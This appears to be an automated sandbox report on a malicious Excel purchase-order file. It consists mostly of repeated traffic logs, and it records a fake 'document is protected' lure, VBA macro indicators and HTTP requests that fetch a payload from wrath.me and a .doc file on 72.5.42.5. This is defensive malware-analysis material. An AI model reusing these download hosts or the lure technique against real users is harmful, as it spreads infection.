Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65441
Source: global trafficTCP traffic: 72.5.42.5:80 -> 192.168.2.6:65438
Source: global trafficTCP traffic: 192.168.2.6:65438 -> 72.5.42.5:80
Source: global trafficTCP traffic: 192.168.2.6:65438 -> 72.5.42.5:80
Source: global trafficTCP traffic: 72.5.42.5:80 -> 192.168.2.6:65438
Source: excel.exeMemory has grown: Private usage: 2MB later: 90MB
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global trafficHTTP traffic detected: GET /5H4sud HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: wrath.meConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /550/gv/picturewithgreatworkingthingshaveonhere__________seethegreatnicepictureofmydeargirl_______thebestpciturewhichalwaysnicetobegreatformewith.doc HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 72.5.42.5
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.42.5
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.42.5
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.42.5
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.42.5
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.42.5
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /5H4sud HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: wrath.meConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /550/gv/picturewithgreatworkingthingshaveonhere__________seethegreatnicepictureofmydeargirl_______thebestpciturewhichalwaysnicetobegreatformewith.doc HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 72.5.42.5
Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: wrath.me
Source: PO20241008.xls, 3EF40000.0.drString found in binary or memory: https://wrath.me/5H4sudm
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65440
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65441
Source: unknownNetwork traffic detected: HTTP traffic on port 65437 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65441 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65440 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65437
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:65437 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.6:65440 version: TLS 1.2

System Summary

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: screenshotOCR: document is protected FABRIC DESCRIPTIC 13 GOODS 14 CTN CMIA recycle polyester singl 15 jersey knit
Source: screenshotOCR: document is protected FABRIC DESCRIPTIC 13 GOODS 14 EO%CTN CMIA recycle polyester singl 15 EIGHT / R
Source: screenshotOCR: document is protected FABRIC DESCRIPTIC 13 GOODS 14 EO%CTN CMIA recycle polyester singl 15 EIGHT / R
Source: screenshotOCR: document is protected FABRIC DESCRIPTIC 13 GOODS 14 EO%CTN CMIA recycle polyester singl 15 EIGHT / R
Source: screenshotOCR: document is protected FABRIC DESCRIPTIC 13 GOODS 14 EO%CTN CMIA recycle polyester singl 15 EIGHT / R
Source: screenshotOCR: document is protected FABRIC DESCRIPTIC 13 GOODS 14 EO%CTN CMIA recycle polyester singl 15 EIGHT / R
Excel sheet contains many unusual embedded objects
Source: PO20241008.xlsOLE: Microsoft Excel 2007+
Source: PO20241008.xlsOLE: Microsoft Excel 2007+
Source: 3EF40000.0.drOLE: Microsoft Excel 2007+
Source: 3EF40000.0.drOLE: Microsoft Excel 2007+
Source: PO20241008.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal64.winXLS@4/20@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9CFBD6B4.emfJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{64252727-6C6F-46C4-85DF-14FCF3317B75} - OProcSessId.datJump to behavior
Source: PO20241008.xlsOLE indicator, Workbook stream: true
Source: 3EF40000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: PO20241008.xlsReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO20241008.xls"
